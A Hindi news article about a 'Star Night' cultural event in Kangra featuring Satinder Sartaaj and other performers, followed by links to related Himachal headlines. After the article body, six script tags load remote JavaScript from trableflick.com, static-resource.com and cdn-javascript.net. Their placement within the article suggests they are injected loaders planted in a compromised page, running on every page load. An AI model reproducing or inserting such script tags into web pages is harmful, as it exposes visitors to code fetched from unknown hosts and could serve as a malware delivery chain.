<p>सब डिविजन स्पोर्ट्स काउंसिल की तरफ से कांगड़ा के नगर परिषद मैदान में 24 और 25 जनवरी को स्टार नाइट का आयोजन किया गया है। स्टार नाइट में सूफी गायक सतिंद्र सरताज अपनी सुरीली आवाज़ से लोगों को मंत्रमुग्ध करेंगे। सूफी गायक 25 तारीक यानि कल स्टार नाइट में अपनी प्रस्तुति देंगे। कांगड़ा के नप मैदान में तैयारियां जोरों पर हैं। यहां लोगों के लूभाने के लिए 100 मीटर हॉट एयर बैलून का इंतजाम किया है और इसकी राइड के लिए 750 रूपये फीस रखी गई है। जिला एसडीएम जतिन लाल मैदान में मौके पर मौजूद है और तैयारी की हर गतिविधि पर नज़र रखे हुए हैं। लोगों को परेशानी न हो इसके लिए मैदान में जमा पानी को सूखाया जा रहा है। </p>
<p>बुधवार को आयोजित प्रेस कॉन्फ्रेंस में एसडीएम जतिन लाल ने बताया था कि फेस्ट में नामी गायक कांगड़ा वासियों का मनोरंजन करेंगे। इस दौरान सतिंद्र सरताज, अनुज शर्मा, गौरव कौंडल, कृतिका तनवर, अभिनव नाग, मोहित गर्ग, करनैल राणा, कुमार साहिल, संजीव दीक्षित, सतनाम पठानिया, श्रुति शर्मा, धीरज शर्मा, सुनील सूफी अपनी प्रस्तुतियां देंगे। कॉमेडियन प्रिंस गर्ग दर्शकों को लोटपोट करेंगे। इसके अलावा कांगड़ा गर्ल्स की दमदार प्रस्तुति आकर्षण का केंद्र रहेगी। वहीं, कांगड़ा ब्वायज मनोरंजन में चार चांद लगाएंगे। उन्होंने कहा कि फेस्ट में हॉट एयर बैलून आकर्षण का केंद्र रहेगा। साथ ही हाई जैकर्स, राकेश ठाकुर, शौर्या शर्मा, शबनम शर्मा, राजेश डोगरा, स्वर सागर, नितेश डांस ग्रुप, निफट, टांडा कॉलेज, उदरम डांस ग्रुप और रुद्राक्ष इंटरनेशनल बैंड की प्रस्तुतियां भी आयोजित करवाई जाएंगी।</p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_876857672&key=21aca573d498d25317&cv=1579847682&t=1579847683221″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_37553814&key=21aca573d498d25317&cv=112272&t=1579847683222″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1579847683227″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…
विपल्व सकलानी English medium education in Himachal; हिमाचल प्रदेश के सरकारी स्कूलों में पढ़ाई का…
Kevin Pietersen India visit; इंग्लैंड के पूर्व स्टार बल्लेबाज केविन पीटरसन ने भारतीय क्रिकेट प्रेमियों…
Panchakarma treatment Hamirpur: हमीरपुर के जिला आयुर्वेदिक अस्पताल में अब वर्ष भर पंचकर्म पद्धति से…
Nadoun tourism development: हिमाचल प्रदेश का नादौन कस्बा, जो शिमला-मटौर फोरलेन नेशनल हाईवे और अटारी-हमीरपुर-मंडी…
Himachal education reforms: हिमाचल प्रदेश में शिक्षा सुधार के तहत अब दो किलोमीटर से…